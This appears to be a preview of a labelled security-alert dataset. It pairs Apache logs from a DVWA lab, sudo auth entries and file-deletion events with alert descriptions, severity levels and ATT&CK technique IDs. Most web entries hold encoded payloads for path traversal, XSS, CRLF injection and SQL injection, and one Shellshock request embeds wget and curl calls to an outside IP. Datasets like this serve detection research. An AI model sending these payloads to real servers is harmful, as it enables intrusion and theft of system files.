source
stringclasses
7 values
full_log
stringlengths
39
4.66k
description
stringclasses
59 values
level
int64
3
15
technique
stringclasses
37 values
tactic
stringclasses
23 values
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:40 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%2f%uF025etc%uF025passwd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:01 +0500] "GET /DVWA/dvwa/includes/DBMS/192.168.204.130.zip HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8windows%uEFC8system32%uEFC8drivers%uEFC8etc%uEFC8hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:12 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c1%af%2e%00%2e%c1%af%2e%00%2e%c1%afboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:57 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:35 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%f0%80%80%afwindows%f0%80%80%afsystem32%f0%80%80%afdrivers%f0%80%80%afetc%f0%80%80%afhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%%35%%63%2e%2e%%35%%63%2e%2e%%35%%63windows%%35%%63system32%%35%%63drivers%%35%%63etc%%35%%63hosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
syscheck
File '/tmp/go-build2724593589/b060/sig_amd64.o' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:11 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%00%2e%c0%2f%2e%00%2e%c0%2f%2e%00%2e%c0%2f%2e%00%2e%c0%2f%2e%00%2e%c0%2fetc%c0%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple common web attacks from same source ip.
10
["T1055","T1083"]
["TA0005","TA0004","TA0007"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:56 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%5c%2e%2e%5c%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%25c1%259c%2e%2e%2e%2f%2e%25c1%259cetc%25c1%259cpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%0aSet-Cookie%3acrlf%3dinjection&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 343 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:42 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%af%2e%2e%c0%afetc%c0%afpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:31 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%bg%qf%2e%2e%bg%qfetc%bg%qfpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:27 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5C%2e%2e%c0%5c%5C%2e%2e%c0%5c%5C%2e%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:06 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%5c%5c%2e%2e%5c%5c%5c%2e%2e%5c%5c%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:34 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cSCRIPT%3ealert('XSS')%3b%3c%2fSCRIPT%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:05 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216%2e%2e%u2216boot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:52 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2e%2e%2e%2e%5c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:25:37 +0500] "GET /news/index.dot?id=../../../../../../../../../../../..//etc/passwd%00.jpg HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:27:56 +0500] "GET /DVWA/login.php?Login=Login&password=&user_token=../../../../../../../../etc/passwd%00index.html&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:58 +0500] "GET /DVWA/login.php?Login=Login&Login=../../../../../../../../etc/passwd%00&password=4kqvfG0t&user_token=8b200124ecd990a2056241cb3415035a&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:35 +0500] "GET /DVWA/login.php?user_token=8b200124ecd990a2056241cb3415035a&user_token=login.php%00.html HTTP/1.1" 200 1722 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:29 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%20%22%3e%3e%3cmarquee%3e%3cimg%20src%3dx%20onerror%3dconfirm(1)%3e%3c%2fmarquee%3e%22%20%3e%3c%2fplaintext%5c%3e%3c%2f%7c%5c%3e%3cplaintext%2fonmouseover%3dprompt(1)%20%3e%3cscript%3eprompt(1)%3c%2fscript%3e@gmail%2ecom%3cisindex%20formaction%3djavascript%3aalert(%2fXSS%2f)%20type%3dsubmit%3e'--%3e%22%20%3e%3c%2fscript%3e%3cscript%3ealert(1)%3c%2fscript%3e%22%3e%3cimg%2fid%3d%22confirm%26lpar%3b%201)%22%2falt%3d%22%2f%22src%3d%22%2f%22onerror%3deval(id%26%23x29%3b%3e'%22%3e%3cimg%20src%3d%22http%3a%20%2f%2fi%2eimgur%2ecom%2fP8mL8%2ejpg%22%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2e%2f%2e%c1%1c%2e%2e%2e%2f%2e%c1%1c%2e%2e%2e%2f%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:32 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:01 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3becho%20'%3cscript%3ealert(1)%3c%2fscript%3e'&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:16:04 +0500] "GET /cgi-bin/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd%00html HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:00 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 341 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:31 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:33 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5cboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:26:03 +0500] "GET /whois.cgi HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:53 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%2f%2e%2e%2fboot%2eini&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%5c%2e%2e%5cboot%2eini%3bindex%2ehtm&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:48:04 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:37 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cb%20%3cscript%3ealert(1)%3c%2fscript%3e0&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Multiple XSS (Cross Site Scripting) attempts from same source ip.
10
["T1059"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%uEFC8%2e%2e%uEFC8%2e%2e%uEFC8etc%uEFC8issue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:08 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c1%8s%2e%2e%c1%8setc%c1%8sissue&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/auth.log
Oct 18 23:46:58 sohaib-virtual-machine sudo: pam_unix(sudo:session): session opened for user root(uid=0) by sohaib(uid=1000)
PAM: Login session opened.
3
["T1078"]
["TA0005","TA0003","TA0004","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:35 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2f%2f%2e%2e%2f%2f%2e%2f%2f%2e%2e%2f%2f%2e%2f%2f%2e%2e%2f%2fwindows%2f%2fsystem32%2f%2fdrivers%2f%2fetc%2f%2fhosts&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:02 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=()%20%7b%20%3a%3b%7d%3b%2fusr%2fbin%2fperl%20-e%20'print%20%5c%22Content-Type%3a%20text%2fplain%5c%5cr%5c%5cn%5c%5cr%5c%5cnXSUCCESS!%5c%22%3bsystem(%5c%22wget%20http%3a%2f%2f135%2e23%2e158%2e130%2f%2etesting%2fshellshock%2etxt%3fvuln%3d13%3bcurl%20http%3a%2f%2f135%2e23%2e158%2e130%2f%2etesting%2fshellshock%2etxt%3fvuln%3d15%3b%5c%22)%3b'&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:26 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%22%2bif(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
SQL injection attempt.
7
["T1190"]
["TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:51 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%5c%2e%2e%2f%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:27:26 +0500] "GET /scripts/contact.php HTTP/1.1" 404 494 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
Multiple web server 400 error codes from same source ip.
10
["T1595.002"]
["TA0043"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:23:38 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%3cscript%3e(%7b0%3a%230%3deval%2f%230%23%2f%230%23(javascript%3aalert(1))%7d)%3c%2fscript%3e&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
XSS (Cross Site Scripting) attempt.
6
["T1059.007"]
["TA0002"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:21:03 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2e%2e%255c%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
["TA0005","TA0004","TA0007","TA0001"]
/var/log/apache2/access.log
192.168.204.1 - - [20/Oct/2023:23:27:21 +0500] "GET /DVWA/login.php?Login=Login&password=&user_token=8b200124ecd990a2056241cb3415035a&user_token=login.php%00.jpg&username= HTTP/1.1" 200 1773 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
A web attack returned code 200 (success).
6
["T1190"]
["TA0001"]
syscheck
File '/tmp/go-build2314020258/b022/_pkg_.a' deleted Mode: realtime
File deleted.
7
["T1070.004","T1485"]
["TA0005","TA0040"]
/var/log/apache2/access.log
192.168.204.1 - - [06/Oct/2023:01:22:50 +0500] "GET /DVWA/vulnerabilities/xss_r/?name=%2e%2e%c0%af%2fetc%2fpasswd&user_token=66a5bdbf45fd3b4821fb265a8c764c8b HTTP/1.1" 302 342 "http://192.168.204.130/DVWA/vulnerabilities/xss_r/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36"
Common web attack.
6
["T1055","T1083","T1190"]
